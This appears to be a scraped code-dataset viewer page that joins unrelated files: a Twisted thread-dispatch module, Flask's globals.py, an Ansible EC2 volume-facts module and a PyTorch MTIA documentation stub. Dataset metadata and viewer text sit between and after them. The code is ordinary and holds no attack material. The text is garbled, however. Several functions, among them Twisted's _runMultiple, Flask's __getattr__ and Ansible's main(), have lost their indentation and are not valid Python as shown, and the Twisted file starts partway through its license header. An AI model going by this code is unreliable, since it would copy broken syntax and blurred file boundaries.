# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Extended thread dispatching support.
For basic support see reactor threading API docs.
API Stability: stable
Maintainer: U{Itamar Shtull-Trauring<mailto:twisted@itamarst.org>}
"""
# twisted imports
from twisted.python import log, failure
# sibling imports
from twisted.internet import defer, reactor
def _putResultInDeferred(deferred, f, args, kwargs):
    """Run a function and give results to a Deferred.

    Runs in a worker thread; the callback or errback is scheduled back on
    the reactor thread via callFromThread.

    @param deferred: the Deferred to fire with the outcome.
    @param f: the callable to invoke.
    @param args: positional arguments for f.
    @param kwargs: keyword arguments for f.
    """
    from twisted.internet import reactor
    try:
        result = f(*args, **kwargs)
    except:
        # Capture the active exception as a Failure. Use a distinct name:
        # the original code rebound the parameter 'f' here, shadowing the
        # callable for no benefit.
        error = failure.Failure()
        reactor.callFromThread(deferred.errback, error)
    else:
        reactor.callFromThread(deferred.callback, result)
def deferToThread(f, *args, **kwargs):
    """Run function in thread and return result as Deferred.

    The callable runs in the reactor's thread pool; the returned Deferred
    fires (callback or errback) on the reactor thread.
    """
    d = defer.Deferred()
    reactor.callInThread(_putResultInDeferred, d, f, args, kwargs)
    return d
def _runMultiple(tupleList):
"""Run a list of functions."""
for f, args, kwargs in tupleList:
f(*args, **kwargs)
def callMultipleInThread(tupleList):
    """Run a list of functions in the same thread.

    tupleList should be a list of (function, argsList, kwargsDict) tuples.
    All of them are executed sequentially in a single thread-pool thread.
    """
    reactor.callInThread(_runMultiple, tupleList)
__all__ = ["deferToThread", "callMultipleInThread"] | unknown | codeparrot/codeparrot-clean | ||
from __future__ import annotations
import typing as t
from contextvars import ContextVar
from werkzeug.local import LocalProxy
if t.TYPE_CHECKING: # pragma: no cover
from .app import Flask
from .ctx import _AppCtxGlobals
from .ctx import AppContext
from .sessions import SessionMixin
from .wrappers import Request
T = t.TypeVar("T", covariant=True)
class ProxyMixin(t.Protocol[T]):
    # Structural protocol describing werkzeug LocalProxy's accessor for the
    # underlying proxied object.
    def _get_current_object(self) -> T: ...
# These subclasses inform type checkers that the proxy objects look like the
# proxied type along with the _get_current_object method. At runtime the
# actual objects are LocalProxy instances (see the assignments below).
class FlaskProxy(ProxyMixin[Flask], Flask): ...

class AppContextProxy(ProxyMixin[AppContext], AppContext): ...

class _AppCtxGlobalsProxy(ProxyMixin[_AppCtxGlobals], _AppCtxGlobals): ...

class RequestProxy(ProxyMixin[Request], Request): ...

class SessionMixinProxy(ProxyMixin[SessionMixin], SessionMixin): ...
# Error message used when a proxy is dereferenced with no app context pushed.
_no_app_msg = """\
Working outside of application context.
Attempted to use functionality that expected a current application to be set. To
solve this, set up an app context using 'with app.app_context()'. See the
documentation on app context for more information.\
"""

# The single context variable holding the current AppContext; every proxy
# below resolves through it.
_cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx")

# Proxy to the whole current AppContext.
app_ctx: AppContextProxy = LocalProxy(  # type: ignore[assignment]
    _cv_app, unbound_message=_no_app_msg
)
# Proxy to the 'app' attribute of the current AppContext.
current_app: FlaskProxy = LocalProxy(  # type: ignore[assignment]
    _cv_app, "app", unbound_message=_no_app_msg
)
# Proxy to the per-context globals object.
g: _AppCtxGlobalsProxy = LocalProxy(  # type: ignore[assignment]
    _cv_app, "g", unbound_message=_no_app_msg
)

# Error message used when request/session are touched outside a request.
_no_req_msg = """\
Working outside of request context.
Attempted to use functionality that expected an active HTTP request. See the
documentation on request context for more information.\
"""

# Proxy to the current request object on the AppContext.
request: RequestProxy = LocalProxy(  # type: ignore[assignment]
    _cv_app, "request", unbound_message=_no_req_msg
)
# Proxy to the current session object on the AppContext.
session: SessionMixinProxy = LocalProxy(  # type: ignore[assignment]
    _cv_app, "session", unbound_message=_no_req_msg
)
def __getattr__(name: str) -> t.Any:
import warnings
if name == "request_ctx":
warnings.warn(
"'request_ctx' has merged with 'app_ctx', and will be removed"
" in Flask 4.0. Use 'app_ctx' instead.",
DeprecationWarning,
stacklevel=2,
)
return app_ctx
raise AttributeError(name) | python | github | https://github.com/pallets/flask | src/flask/globals.py |
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_vol_facts
short_description: Gather facts about ec2 volumes in AWS
description:
- Gather facts about ec2 volumes in AWS
version_added: "2.1"
requirements: [ boto3 ]
author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVolumes.html) for possible filters.
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all volumes
- ec2_vol_facts:
# Gather facts about a particular volume using volume ID
- ec2_vol_facts:
filters:
volume-id: vol-00112233
# Gather facts about any volume with a tag key Name and value Example
- ec2_vol_facts:
filters:
"tag:Name": Example
# Gather facts about any volume that is attached
- ec2_vol_facts:
filters:
attachment.status: attached
'''
# TODO: Disabled the RETURN as it was breaking docs building. Someone needs to
# fix this
RETURN = '''# '''
import traceback
try:
from botocore.exceptions import ClientError
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import connect_to_aws, ec2_argument_spec, get_aws_connection_info, boto3_conn, HAS_BOTO3, boto3_tag_list_to_ansible_dict
from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, camel_dict_to_snake_dict
from ansible.module_utils._text import to_native
def get_volume_info(volume, region):
    """Build the volume-facts dict from a snake_cased boto3 volume.

    :param volume: volume dict from describe_volumes, already passed through
        camel_dict_to_snake_dict (with 'tags' kept as a boto3 tag list).
    :param region: AWS region name to include in the result.
    :return: dict of volume facts in the module's documented shape.
    """
    attachments = volume["attachments"]
    # Only the first attachment is reported. Using a single guarded lookup
    # replaces five repeated 'len(attachment) > 0' conditionals, and .get()
    # tolerates attachment entries that omit a field.
    first = attachments[0] if attachments else {}

    volume_info = {
        'create_time': volume["create_time"],
        'id': volume["volume_id"],
        'encrypted': volume["encrypted"],
        'iops': volume.get("iops"),
        'size': volume["size"],
        'snapshot_id': volume["snapshot_id"],
        'status': volume["state"],
        'type': volume["volume_type"],
        'zone': volume["availability_zone"],
        'region': region,
        'attachment_set': {
            'attach_time': first.get("attach_time"),
            'device': first.get("device"),
            'instance_id': first.get("instance_id"),
            'status': first.get("state"),
            'delete_on_termination': first.get("delete_on_termination"),
        },
        'tags': boto3_tag_list_to_ansible_dict(volume['tags'])
    }

    return volume_info
def describe_volumes_with_backoff(connection, filters):
    """Return all volumes matching filters, paginating through results."""
    # NOTE(review): despite the name, no retry/backoff decorator (e.g.
    # AWSRetry) is applied here -- confirm whether throttling retries
    # were intended.
    paginator = connection.get_paginator('describe_volumes')
    return paginator.paginate(Filters=filters).build_full_result()
def list_ec2_volumes(connection, module, region):
    """Describe EBS volumes matching the module's filters and exit_json them.

    Filter keys may be given with underscores for compatibility; they are
    rewritten to the dash-separated form the EC2 API expects, except tag
    filters ('tag:...'), which are left untouched.
    """
    # Default to an empty dict: the 'filters' option defaults to None and
    # iterating None would raise a TypeError.
    sanitized_filters = module.params.get("filters") or {}
    # Iterate over a snapshot of the keys: the loop body pops and inserts
    # keys, and mutating a dict while iterating it raises RuntimeError on
    # Python 3.
    for key in list(sanitized_filters):
        if not key.startswith("tag:"):
            sanitized_filters[key.replace("_", "-")] = sanitized_filters.pop(key)
    volume_dict_array = []

    try:
        all_volumes = describe_volumes_with_backoff(connection, ansible_dict_to_boto3_filter_list(sanitized_filters))
    except ClientError as e:
        module.fail_json(msg=e.response, exception=traceback.format_exc())

    for volume in all_volumes["Volumes"]:
        # Keep the raw 'Tags' list so get_volume_info can convert it itself.
        volume = camel_dict_to_snake_dict(volume, ignore_list=['Tags'])
        volume_dict_array.append(get_volume_info(volume, region))

    module.exit_json(volumes=volume_dict_array)
def main():
    """Module entry point: connect to EC2 and gather volume facts."""
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            filters=dict(default=None, type='dict')
        )
    )

    module = AnsibleModule(argument_spec=argument_spec)

    if not HAS_BOTO3:
        module.fail_json(msg='boto3 required for this module')

    region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)

    connection = boto3_conn(
        module,
        conn_type='client',
        resource='ec2',
        region=region,
        endpoint=ec2_url,
        **aws_connect_params
    )

    # list_ec2_volumes calls module.exit_json/fail_json itself.
    list_ec2_volumes(connection, module, region)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# torch.mtia.mtia_graph
The MTIA backend is implemented out of tree; only the interfaces are defined here.
```{eval-rst}
.. automodule:: torch.mtia.mtia_graph
```
```{eval-rst}
.. currentmodule:: torch.mtia.mtia_graph
```
```{eval-rst}
.. autofunction:: graph_pool_handle
```
```{eval-rst}
.. autoclass:: MTIAGraph
:members:
```
```{eval-rst}
.. autoclass:: graph
:members:
``` | unknown | github | https://github.com/pytorch/pytorch | docs/source/mtia.mtia_graph.md |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.